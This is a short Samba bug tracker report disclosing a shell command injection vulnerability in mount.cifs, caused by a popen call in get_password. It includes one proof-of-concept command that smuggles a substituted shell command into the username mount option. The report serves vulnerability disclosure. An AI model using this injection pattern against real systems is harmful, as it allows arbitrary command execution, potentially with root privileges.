https://bugzilla.samba.org/show_bug.cgi?id=14442

            Bug ID: 14442
           Summary: Shell command injection vulnerability in mount.cifs
           Product: CifsVFS
           Version: 2.4
          Hardware: All
                OS: Linux
            Status: NEW
          Severity: major
          Priority: P5
         Component: kernel fs
          Assignee: sfrench@xxxxxxxxx
          Reporter: vadim@xxxxxxxxxx
        QA Contact: cifs-qa@xxxxxxxxx
  Target Milestone: ---

mount.cifs command is using "popen" library call in get_password which allows for shell command execution.

Example:

sudo /bin/mount -t cifs -o username="test \$(id)" //1 /mnt